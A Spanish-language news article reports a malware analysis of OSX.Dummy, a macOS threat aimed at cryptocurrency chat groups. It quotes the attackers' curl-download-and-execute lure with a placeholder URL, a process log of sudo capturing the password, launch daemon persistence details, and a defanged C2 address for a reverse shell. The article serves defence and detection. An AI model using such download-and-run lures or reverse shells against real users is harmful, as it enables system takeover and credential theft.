OSX Dummy malware se dirige a la comunidad de criptomonedas
El ex investigador de malware y hacker de hackers de la NSA, Patrick Wardle, analizó un nuevo malware mac llamado OSX.Dummy que apunta a la comunidad de criptomonedas
Los expertos populares decidieron analizar el código malicioso luego de que el investigador de seguridad Remco Verhoef (@remco_verhoef) publicara una entrada interesante en el blog de InfoSec Handlers Diary de SANS titulada " Crypto community target of MacOS malware ".
"En días anteriores, hemos visto varios ataques de malware MacOS, que se originan dentro de grupos de chats de Slack o Discordia relacionados con cifrado al suplantar a administradores o personas clave. Se están compartiendo pequeños fragmentos, lo que resulta en la descarga y ejecución de un archivo binario malicioso. "Escribió Verhoef.
La intención de Wardle era demostrar que las herramientas de Objective-See pueden frustrar genéricamente esta nueva amenaza, incluso si no fue detectada por todo el software antivirus.
Verhoef notó que el ataque se originaba dentro de los grupos de chats Slack o Discord relacionados con cifrado al suplantar a administradores o personas clave.
Los atacantes compartieron pequeños fragmentos de código como el siguiente, lo que resultó en la descarga y ejecución de un archivo binario malicioso. $cd /tmp && curl -s curl $ MALICIOUS_URL script && chmod + x script && ./script
Wardle notó que el binario malicioso no está firmado, esto significa que GateKeeper lo bloquearía, pero los atacantes superaron esta limitación al hacer que las víctimas descargaran y ejecutaran el binario directamente a través de los comandos del terminal.
Wardle realizó un análisis dinámico del malware utilizando una máquina virtual High Sierra con varias herramientas Objective-See instaladas.
El malware primero establece el script para ser propiedad como root
# procInfo
monitoreo de eventos de proceso ...
inicio del proceso:
pid: 432
ruta: /usr/bin/sudo
args: (
"/usr/bin/sudo",
"-S",
"-pag",
"# node-sudo-passwd #",
chown,
raíz,
"/tmp/script.sh"
)
Luego cambia los permisos del archivo a root ejecutando el comando sudo , pero esto requerirá que el usuario ingrese la contraseña en el terminal.
La contraseña es guardada por el código malicioso en la carpeta /tmp/dumpdummy;
El malware realiza una serie de operaciones que le permiten ganar persistencia a través de un daemon de lanzamiento malicioso.
El malware establece la clave RunAtLoad en verdadero, esto implica que el valor de la clave de programa, /var/root/script.sh, se ejecutará automáticamente por el sistema operativo cada vez que se reinicie el sistema.
La secuencia de comandos intentará conectarse a 185[.]243.115.230 en el puerto 1337.
"Luego, duplica stdin, stdout y stderr en el socket, antes de ejecutar /bin/sh con el indicador - i.
En otras palabras, está configurando un shell inverso interactivo . " Explicó Wardle.
"Si tiene instalado un producto de firewall, como LuLu de Objective-See , esta actividad de red será detectada"
Si el malware conecta con éxito el servidor de C & C (185[.]243.115.230:1337), el atacante podrá ejecutar arbitrariamente comandos como raíz en el sistema de destino.
Debajo de los hallazgos clave del análisis de Wardle en el OSX.Dummy:
- El método de infección es tonto
- El tamaño masivo del binario es tonto
- El mecanismo de persistencia es cojo (y por lo tanto también tonto)
- Las capacidades son bastante limitadas (y por lo tanto bastante tontas)
- Es trivial detectar en cada paso (tan tonto) ... y finalmente, el malware guarda la contraseña del usuario para dumpdummy
"Para comprobar si está infectado, ejecute KnockKnock como root (ya que los componentes del programa malicioso son legibles solo por root).
Busque un elemento de inicio sin firmar com.startup.plist ejecutando algo llamado 'script.sh' ", concluyó Wardle.